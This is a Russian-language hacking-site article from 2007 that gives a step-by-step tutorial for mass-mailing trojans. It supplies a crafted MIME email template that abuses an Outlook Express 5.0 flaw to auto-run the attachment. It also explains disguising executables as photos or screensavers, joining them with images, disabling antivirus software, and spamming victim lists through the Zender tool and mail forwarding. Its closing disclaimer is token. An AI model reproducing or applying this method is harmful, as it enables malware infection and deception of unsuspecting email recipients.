Сделать стартовой Отправить e-mail Главная  Блог  Новости  Форум  Гостевая  Статьи  Файлы  Изображения  Онлайн игры  Сайты  Фильмы на DVD  Каталог карт CS  Winamp обложки English version Die deutsche version La version francaise النسخة العربية

Каталог статей

Главная » Статьи » Компьютеры » Взлом (Хак) Hack » Эффективный способ впаривания троянов [ Добавить материал ]
 
Компьютерный моддинг [1] Программирование на C++ [12] Комуникация и сети [9]
Взлом (Хак) Hack [10] OS Windows [10] Безопасность [15]
InterNet [35]
 
Эффективный способ впаривания троянов
28.11.2007
Сразу предупреждаю что статья написанна для новичков в этом деле, поэтому не надо кричать и махать руками что типа всё это знаем и умеем, может вы и знаете и умеете, а другие только начинают учится и думаю им это будет полезно знать. Я знаю что об этом статьи уже писались и поэтому не претендую на полное авторство, но в тех статьях которые я видел всё описывалось скупо, отдельно, несвязанно с друг другом и неподробно, я же попытаюсь всё конкретизировать, обобщить и разложить по полочкам (даже разжевать:) так чтоб любой более менее начинающий юзверь мог во всё врубится. И так что для этого понадобится:
The Bat! – один из лучших почтовых клиентов, (как у тебя его ещё нет, давай сейчас же дуй в какой нить поисковик , ищи его, скачивай, устанавливай и сноси нафиг свой ОутглюкЕхпресс, а то трояна впаришь не ты , а его впарят тебе, причём без твоего согласия).
Zender – спецальная программа для посылки писем с трояном в дыру Оутглюка (качать с http://www.hack-it.by.ru/soft), о ней чуть ниже и поподробнее.
Троян - в принципе любой, желательно чтоб не палящийся был.
Ну и ещё какой нить joiner, их сейчас много развелось так что сами выбирайте, и желательно чтоб он умел менять иконки и закрывать анитивирусы и фаирволы ( и всего то….J).
И так способ этот рулит в Windows 95-98SE (без заплаток) и если установлен основной почтовый клиент это их же OutlookExpress 5.0, они сейчас пока наиболее распространены и в основном большинство народа юзает их….. да да WindowsХреновоРаботает ещё мало кто поставил…. Так что шансы нарваться на таких у вас большие (небось сами на этом софте то сидите ;-).
И так как вы раньше рассылали ламерам трояна, брали просто атачили к письму файл с троянам, писали какой нить текст в письме чтоб жертве захотелось открыть его, рассылали по спам листам и надеялись на то что найдётся жертва которая окажется полным ламерьём и откроет приатаченный файл и вот ты уже летишь по халявному инету или форматируешь ламеру диск :) ( а может и идёшь по тёмному коридору заложив руки за спину в сопровождении дяденьки с отдела «Рэ» :) , но щас народ уже в основном учёный пошёл и просто так файлы пришедшие почтой не открывает, а для начала бережно сохраняет на диск и потом с упоением насилует их всякими там АВП , Докторами Вьебами и Нортонами, а потом уже думает открывать его или нет. Ну…..нам это надо . Какой шанс что кто то откроет и запустит к себе твою коняшку…..правильно шанс просто мизерный.
Поэтому то нам надо сделать так чтоб файл в письме запустился автоматически как только жертва получит это письмо ….. ну …хорошо же чтоб так было… и не надо ни кого уговаривать ( ещё раз подчеркну что рулит всё в Win9x и OE 5.0 ). И так для начала создаём файл mail.eml , затем открываем его в любом текстовом редакторе (желательно в WordPad) и вставляем в него такую вот запись:
From: SuperMegaXaker
To:
Subject: !!!!!Poluchai gad troyana!!!!
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable



--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="Troyan.jpg.exe”
Content-Transfer-Encoding: base64
Content-ID:

На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста )

--====_ABC1234567890DEF_====

--====_ABC1234567890DEF_====--

Кстати в проге zender уже лежит пример готового файл Mail.eml с уже вложенным туда трояном. Открыв его также в текстовом редакторе вы и увидете как в нём будет выглядит сам файл трояна тесктом, он там как раз и будет в base-64 кодировке. Выглядеть это будет примерно вот так:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAgAAAAA
4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC
BiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB
QRQAATAEDAGVj+zwAAAAAAAAAAOAADwELAQED
ABAAAAAQAAAAYAAA4HkAAABwAAAAgAAAAABAAA
AQAAAAAgAAAQAAAAAAAAAEAAAAAAAAAACQAAAA
EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAA
ABAAAAAAAAAAAAAAAKSDAAB0AQAAAIAAAKQDAA
AAAAAAAAAAAAAAAAAAААА

Это и есть сам файл трояна , просто он в кодировке base-64.
Но только не открывайте этот файл вашим Оутглюком, так как у автора проги видно есть «чуство юмора» и он вместо того чтоб вложить в это письмо для примера какую-нить безобидную программку…. вложил туда настоящего своего трояна и если вы это письмо откроете своим Оутглюком то он сразу автоматически запустится у вас на компе. Ну а вы думаете почему я вас Bat поставить просил. Да и ещё установите в Бате в настройках ассоциации файлов .eml с Батом и тогда такие файлы у вас будут открыватся не в Оутглюке а в Бате и вы сможете их спокойно открывать и смотреть, так как в Бате такого бага как в Оутлюке нету.
И так письмо у нас есть, теперь в него надо вставить трояна. И что надо сделать чтобы вставить в ваше в письмо mail.eml уже сконфигурированного вами вашего родного трояна и как узнать как он выглядит в base-64 кодировке. Для этого нам и пригодится Бат. Открываем его. В нём создаём новое письмо, присоединяем к нему вашего трояна и жмём на кнопочку отправить , не важно кому так как мы его отправлять ни куда не собираемся, письмо соответственно попадёт в папку «Исходящие» (это если у вас Бат русифицирован), но нам оно там нам не нужно поэтому берём и перемещаем его в папку «Входящие» (просто перетаскиваем мышкой), затем открываем его там щёлкая по нему два раза и ищем в открывшемся окне вверху меню «Спецальное» а в нём выбираем «исходный текст» и увидим наше письмо токлько файл с нашим трояном будет там как раз в нужной нам base-64 кодировке, я уже говорил как он будет выглядеть (внешнее похоже на большой блок ровного и непрерывного текста), так вот выделяем именно только этот текст и копируем его в буфер обмена (для тех кто не знает кто это такая «буфер обмена» то копируйте в простой текстовой документ :). Затем открываем наше уже заготовленное письмо mail.eml в текстовом редакторе и вставляем этот текст заместо того который я уже писал выше:
На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста)

Саму эту надпись конечно же удаляем!!! Сории что объясняю как даунам каким то , но ведь блин найдутся те которые так и не врубятся куда что и заместо чего вставлять.
Так же можете взять пример письма из проги Zender (там он называется Mail.eml) и так же открыв его в тестовом редакторе удалить из него только текст (в base-64 кодировке) файла с трояном автора и вставить туда текст (в base-64 кодировке) уже своего сконфигурированного трояна. Кстати не забудьте поменять в файле строки From , To и Subject на нужные вам, и ещё поменяйте в строке Name="имя_трояна.exe" на что нибудь другое типа name="my_sexy_foto.jpg.exe".
То что вы там поставите и будет отбражаться в полях письма From, To, Subject и имя приатаченного файла , которое получит жертва. Кстати нам так же пригодится и Joiner , склейте с трояном какую нить фотку, потому что не у всех может Оутглюк стоять и когда жертва будет открывать файл уже самостоятельно ей предстанет перед глазами эта фотка, а ваш троян в это время будет делать своё грязное дело.
Да, ещё за место расширения файла .exe можно поставаить .scr – это расширение у скринсейверов (программ-заставок) но действовать будет так же как и с .exe , просто таким образом можно немного усыпить бдительность жертвы. Сохраняемся, и всё письмо с трояном mail.eml готово. Теперь если открыть это письмо Оутглюком то файл автоматически запустится. Теперь о том как пользоваться Zenderom для отсылки этого письма, потому как обычной почтовой програмой его не отошлёшь так как она поменяет все заголовки на другие и троян в письме уже автоматически не запустится . Для начала прочтите там файл с описанием. Если не поняли то объясню на пальцах. В начале кладёте ваше письмо mail.eml в папку с Zenderom.
Там же в папке есть файл user.txt . Он нам и нужен для рассылки. В первой строчке после from= пишем любой существующий адрес на каком нить бесплатном мыльном сервисе, главное чтоб он там существовал и чтоб сервак имел smtp сервер. Ну например from=vasya@mail.ru . Он в принцепе не имеет большого значения и нужен для того чтоб прога могла через этот мыльный сервак и его smtp сервер разослать письмо уже на адреса ваших жертв. А вот на следущей строчке уже просто пишите адреса ваших жертв, их может быть сколь угодно много главное чтоб они все начинались с новой строки. Теперь запускаете саму прогу zender.exe и она разашлёт ваше письмо с трояном по всем этим адресам. Кстати у проги нет интерфейса ( т.е. ни каких окошечек у вас не появится) , так что следить за тем как она рассылает письмо можно будет по самому соединению (значок который мигает у вас в трее когда вы подключаетесь к инету). Когда она разошлёт письмо по всем указаным вами адресам то появится окошко с надписью All done это значит что письмо разослано. А если вы рассылаете не на один адресс, а например по спам листу на несколько десятков адрессов, то чтоб не ждать пока прога разошлёт файл по всем этим адрессам и не терять много драгоценного время в инете делайте так….. заведите себе например на рамблере любое мыло и поставтье на нём переадресацию на имеющиеся у вас многочисленные адресса жертв, а в файле user.txt заместо адрессов жертв напишите всего один адрес этого вашего мыла на рамблере и всё, теперь запустите прогу и она пошлёт письмо на этот адресс, а уж сервак рамблера сам сделает за вас всю грязную работу и разашлёт письмо по всем адресам которые вы указали в переадресации.
Так что теперь эфективность рассылки трояна у вас значительно повысится по сравнению с тем как вы его раньше рассылали простым дедовским способом :)))). Так как ещё много тех кто сидит на Вынь9х и Отглюках :).
Кстати щас само письмо mail.eml сосотавленное таким вот образом чтоб автоматически запускался приатаченный к нему файл определяется многими антивирусами как троян даже если вы туда ещё ни кого трояна и не вставляли, у меня например мой ДокторВъеб ругается на это письмо что типа это troyanIframe :)))), правда если письмо лежит в каком zip архиве то он на него молчит, хотя ведь сами архмвы он шмонать умеет хорошо, вот так то, так что на время составления письма придётся выгружать ваши антивирусные мониторы , а то ведь работать нормально не дадут :)).
Ну вот и всё. По моему всё понятно рассказал. У кого будут какие вопросы пишите (можете даже такие вот письма с автозапуском… у меня всё равно Бат стоит :))))). Удачи.

Всё всё всё всё всё что вы тут можете прочитать, представлено вам только для ознакомлениея и не для чего больше ))) ;-).

Категория: Взлом (Хак) Hack | Добавил: hl-away (28.11.2007) | Просмотров: 463 | Рейтинг: Голосов: 0/Рейтинг: 0.0 |
Всего комментариев: 0
Дорогие посетители и пользователи, пожалуйста, оцените публикацию и напишите свой комментарий к ней, тем самым Вы поможете развитию проекта hl-away ! info
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
 

Вход
 

Облако тегов

Cтатистика
Интернет карта
Каталог сайтов и ссылок url.moy.su

Онлайн всего: 1
Гостей: 1
Пользователей: 0

Сегодня были: